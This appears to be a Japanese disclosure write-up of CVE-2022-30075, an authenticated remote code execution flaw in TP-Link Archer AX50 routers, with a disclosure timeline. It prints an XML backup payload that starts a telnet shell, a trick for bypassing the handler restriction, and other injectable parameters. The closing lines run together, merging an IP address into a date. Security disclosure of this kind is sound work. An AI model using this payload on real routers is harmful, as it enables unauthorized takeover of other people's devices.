
Tp-Link Archer AX50 認証済みRCE (CVE-2022-30075)
Tp-Linkルーターにおける認証済みリモートコード実行
お使いのTp-Linkルーターにバックアップと復元機能があり、ファームウェアが2022年6月より古い場合、脆弱性の影響を受ける可能性があります。
Tp-Link Archer AX50。他のtplinkルーターではバックアップの形式が異なる場合があり、エクスプロイトの修正が必要になることがあります。
ルーター上でtelnetデーモンを起動するためのエクスプロイトを使用

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler の変更をブロックする制限がありますが、親XMLノードの名前を変更することで簡単に回避できます(例:name="exploit")system.button.handler パラメータの変更だけでなく、ddns.service.ip_script、firewall.include.path、uhttpd.main などを使用しても実現可能です.../usr/sbin/telnetd -l /bin/login.sh を実行telnet 192.168.1.115.03.2022 - 脆弱性を特定 15.03.2022 - Tp-Linkサポートに連絡 16.03.2022 - Tp-Linkから返信を受信 02.05.2022 - CVEが割り当てられる 27.05.2022 - Tp-Linkが脆弱性を修正したファームウェアをリリース 07.06.2022 - 技術的詳細を公開